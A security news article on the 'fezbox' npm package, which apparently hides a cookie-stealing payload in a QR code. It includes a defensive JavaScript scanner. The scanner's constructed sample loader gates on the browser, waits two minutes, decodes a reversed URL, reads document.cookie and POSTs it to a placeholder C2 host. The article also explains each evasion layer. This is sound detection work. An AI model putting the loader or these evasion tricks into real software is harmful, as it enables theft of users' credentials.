New Malware in npm Package Uses Steganographic QR Codes to Steal Browser Passwords

A malicious package discovered in the npm ecosystem delivers its final payload inside a QR code image, a method of concealment not previously seen in npm supply chain attacks. The technique shows how attackers keep finding ways to slip code past registry scanners and casual code review: the package source contains no readable payload at all, only a loader that fetches and decodes an image.

The Malicious Package: "Fezbox"

The package, published under the name "fezbox," presents itself as a legitimate JavaScript/TypeScript utility library, advertising TypeScript support, performance optimization, and a modular layout. Behind that front it runs a credential-stealing routine whose final stage is delivered inside a QR code.

Its README describes common helper functions organized by feature module so that developers can import only what they need, and it lists a QR Code Module for generating and parsing codes. What the README omits is that the package also fetches a QR code image from a remote URL at runtime and executes the JavaScript decoded from it.

Discovery and Analysis

Researchers at Socket.dev flagged the package after its code showed behavior inconsistent with a utility library. Their analysis found several layers of obfuscation: reversed strings, minified code, and a final payload carried inside a QR code image rather than anywhere in the package source.

At the time of the analysis the package was still live on the npm registry. Socket.dev petitioned the npm security team to remove it and to suspend the publisher's account.

Advanced Steganographic Payload Delivery

The malware runs a multi-stage routine built to evade sandboxes and automated analysis. It first checks for browser-specific globals (window and document), so the malicious code runs only inside a real browser and stays dormant in Node.js test runners, CI jobs and analysis environments that lack them. Once those checks pass, it waits 120 seconds before fetching the payload, long enough to outlast the execution window of many dynamic-analysis sandboxes.

The loader's key string is a URL stored reversed so that it does not look like a URL to a string scanner. Reversed back, it points to a QR code image hosted on Cloudinary. The QR code's encoded data is the final stage: JavaScript that reads username and password values out of the browser's cookies. Strictly speaking the payload is the QR code's ordinary decoded content rather than data hidden in the image's pixels, but the effect is the same as classic steganography: anyone viewing the image sees a QR code, and the malicious code never appears as text in the package.

Once decoded and executed, the payload searches the browser's cookies for fields named "username" and "password"; the field names are themselves obfuscated so they do not appear as plain strings either. Anything it finds is sent by HTTPS POST to a command-and-control endpoint hosted on Railway, a cloud application platform. The theft only yields results on sites that store credentials in cookies under those names, which is poor practice but costs the attacker nothing to try; cookies marked HttpOnly are not readable from JavaScript and are out of its reach.
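The loader pattern described above (browser gating, a long delay, a reversed URL, a cookie read and an outbound POST) is easier to catch in code review than in a registry scan for known bad strings. The following is an added example written for this article, not code from the Socket.dev analysis or from the fezbox package: a small static heuristic scanner that flags those traits in JavaScript source. Both input samples are constructed; the hostnames in them are placeholders and not the real infrastructure. The rule names and the 60-second delay threshold are assumptions chosen for illustration.

```javascript
// Added example, not code from the Socket.dev analysis or from the fezbox
// package: a static heuristic scanner for the loader pattern described above.
// It looks for (1) a string literal that becomes an https:// URL when
// reversed, (2) the split('').reverse().join('') idiom, (3) browser gating on
// window/document, (4) a long setTimeout delay, (5) document.cookie reads and
// (6) an outbound POST. It is a regex heuristic, not a JavaScript parser, so
// treat hits as triage leads rather than verdicts. Both samples are constructed.

const URL_RE = /^https?:\/\/[^\s'"`]+$/i;
const REVERSAL_IDIOM_RE = /\.split\(\s*(['"])\1\s*\)\s*\.reverse\(\)\s*\.join\(/;
const BROWSER_GATE_RE = /typeof\s+(window|document)\s*!==?\s*['"]undefined['"]/;
const COOKIE_RE = /document\.cookie/;
const POST_RE = /method\s*:\s*['"]POST['"]/i;
const LONG_DELAY_MS = 60000; // assumed threshold; far above normal library init delays

// Pull out the bodies of single-, double- and backtick-quoted string literals.
function collectStringLiterals(src) {
  const out = [];
  const re = /(['"`])((?:\\.|(?!\1)[^\\])*)\1/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[2]);
  return out;
}

function reverseString(s) {
  return Array.from(s).reverse().join('');
}

// Literals that are not URLs as written but become one when reversed.
function findReversedUrls(src) {
  return collectStringLiterals(src)
    .filter((lit) => !URL_RE.test(lit) && URL_RE.test(reverseString(lit)))
    .map(reverseString);
}

function scanSource(src) {
  const rules = [];
  const hiddenUrls = findReversedUrls(src);
  if (hiddenUrls.length > 0) rules.push('reversed-url');
  if (REVERSAL_IDIOM_RE.test(src)) rules.push('string-reversal-idiom');
  if (BROWSER_GATE_RE.test(src)) rules.push('browser-gating');
  const numbers = (src.match(/\b\d+\b/g) || []).map(Number);
  if (/setTimeout/.test(src) && numbers.some((n) => n >= LONG_DELAY_MS)) rules.push('long-delay');
  if (COOKIE_RE.test(src)) rules.push('cookie-access');
  if (POST_RE.test(src)) rules.push('outbound-post');
  return { rules, hiddenUrls };
}

// A hidden URL alone is enough to escalate; so is cookie access paired with an
// outbound POST. The remaining rules are corroborating signals only.
function isSuspicious(result) {
  const has = (r) => result.rules.includes(r);
  return has('reversed-url') || (has('cookie-access') && has('outbound-post'));
}

// Constructed sample mirroring the loader behaviour described in the article.
// The reversed literal decodes to https://cdn.example.com/assets/qr-code.png.
const SUSPICIOUS_SAMPLE = `
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  setTimeout(async function () {
    var u = 'gnp.edoc-rq/stessa/moc.elpmaxe.ndc//:sptth'.split('').reverse().join('');
    var img = await fetch(u);
    /* decode the QR image and run the JavaScript it carries */
    var c = document.cookie;
    fetch('https://c2.example.net/collect', { method: 'POST', body: c });
  }, 120000);
}
`;

// Constructed benign sample: an ordinary utility module with a plain URL.
const BENIGN_SAMPLE = `
function chunk(arr, size) {
  var out = [];
  for (var i = 0; i < arr.length; i += size) out.push(arr.slice(i, i + size));
  return out;
}
var DOCS_URL = 'https://example.com/docs';
module.exports = { chunk: chunk, DOCS_URL: DOCS_URL };
`;

console.log(scanSource(SUSPICIOUS_SAMPLE));
console.log(isSuspicious(scanSource(SUSPICIOUS_SAMPLE)), isSuspicious(scanSource(BENIGN_SAMPLE)));
```

Run it with node against the text of a dependency's files (for instance by reading every .js file under node_modules/<package>) and review anything that scores as suspicious by hand. The reversed-URL check is the most specific signal here; the others are common in legitimate isomorphic libraries and only matter in combination.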

Implications and Defense

This layering of environment checks, a timing delay, string reversal, concealment of the payload in an image, and credential theft is a notable escalation in npm-based supply chain attacks. Each layer targets a different detection method: the delay and environment checks defeat sandboxes, the reversed URL defeats string scanning, and the QR code keeps the payload out of the package entirely.

The case is a reminder that dependencies need the same scrutiny as first-party code. Practical checks: pin dependency versions and commit lockfiles; review new or low-adoption packages before adopting them, and be wary of any library that fetches remote images or other assets at runtime and then decodes and executes their contents; search dependencies for document.cookie access and for string-reversal idioms that hide URLs; and on the application side, set a Content-Security-Policy connect-src that limits where the page can send data, and never store credentials in cookies that JavaScript can read.

Registry scanning will keep improving, and so will the techniques used to evade it. Following reports like this one and periodically reviewing how dependencies are vetted and monitored is the practical way to limit exposure to the next variant.